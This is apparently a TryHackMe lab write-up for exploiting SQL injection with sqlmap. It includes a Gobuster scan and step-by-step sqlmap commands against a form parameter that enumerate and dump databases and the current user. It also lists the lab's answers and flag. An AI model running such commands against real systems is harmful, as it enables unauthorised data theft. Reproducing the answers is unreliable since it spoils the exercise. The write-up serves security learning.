TryHackMe | SQLMAP | Walkthrough

 

Exploiting SQL Injection in a TryHackMe Lab

SQL injection (SQLi) remains one of the most critical vulnerabilities in modern web applications, frequently ranking in the OWASP Top 10. Despite being decades old, it continues to compromise organizations worldwide.

In this article, we walk through the SQLMap TryHackMe lab a guided exercise that demonstrates how attackers identify and exploit SQLi vulnerabilities to extract sensitive data from insecure applications.

Target Discovery

The lab provides a target IP:

http://10.10.85.185/

At first glance, the root directory appears blank. To uncover hidden directories, we run a Gobuster scan:

gobuster dir -u http://10.10.85.185/ -w /usr/share/kali-wordlists/dirbuster/directory-list-2.3-medium.txt

Result: A new endpoint is discovered http://10.10.85.185/blood/

Initial Recon | The Blood Form

At /blood/, we find a form that accepts blood group input. Testing reveals that the form processes POST requests, making it a potential injection point.

Instead of injecting payloads manually, we leverage Burp Suite to capture the raw POST request and save it as bloodreq.txt for automated testing.

Step 1: Testing for SQL Injection with SQLMap

Using the captured request, we launch SQLMap against the blood_group parameter:

sqlmap -r bloodreq.txt -p blood_group --dbs

Flags explained:

  • -r: Load request from a raw file.

  • -p: Define the vulnerable parameter.

  • --dbs: Enumerate databases on the backend server.

Output confirms that the parameter is vulnerable, and SQLMap begins enumerating available databases.

Step 2: Enumerating Tables

Suppose one of the identified databases is called blood. We enumerate its tables with:

sqlmap -r bloodreq.txt -p blood_group -D blood --tables

SQLMap outputs a list of tables for further exploration.

Step 3: Extracting Columns

Targeting the blood_db table, we enumerate columns:

sqlmap -r bloodreq.txt -D blood -T blood_db --columns

Columns give us insight into the structure of the database, such as credentials or application-specific data.

Step 4: Dumping Data

The real value comes when dumping data from tables:

sqlmap -r bloodreq.txt -p blood_group -D blood -T blood_db --dump

Alternatively, dump everything:

sqlmap -r bloodreq.txt -D blood --dump-all

In this lab, dumping data reveals credentials and a flag table, the ultimate proof of compromise.

Step 5: Identifying Database User

Finally, we query the current database user:

sqlmap -r bloodreq.txt -p blood_group --current-user

The lab confirms the database user is root.

Challenge Recap

  • Interesting directory?blood

  • Current DB user?root

  • Final flag?thm{sqlm@p_is_L0ve}

Key Takeaways

  • SQLMap is a highly automated SQLi exploitation tool, reducing manual effort.

  • SQL injection vulnerabilities can lead to complete database compromise — data exfiltration, credential theft, and even full system takeover.

  • Always follow the principle of least privilege: web apps should never run as root in production.

  • Legal Reminder: Tools like SQLMap should only be used in authorized environments such as labs or penetration testing engagements.

Final Thoughts

The TryHackMe SQLMap lab reinforces how trivial it can be for attackers to exploit misconfigured applications. For defenders, this underlines the importance of:

  • Secure coding practices (prepared statements, ORM frameworks).

  • Continuous vulnerability scanning and penetration testing.

  • Strict database permissions and monitoring for suspicious queries.

In the wrong hands, SQL injection is devastating. In the right hands, as demonstrated here, it is a powerful lesson in proactive defense.

Comments

Post a Comment

Popular Posts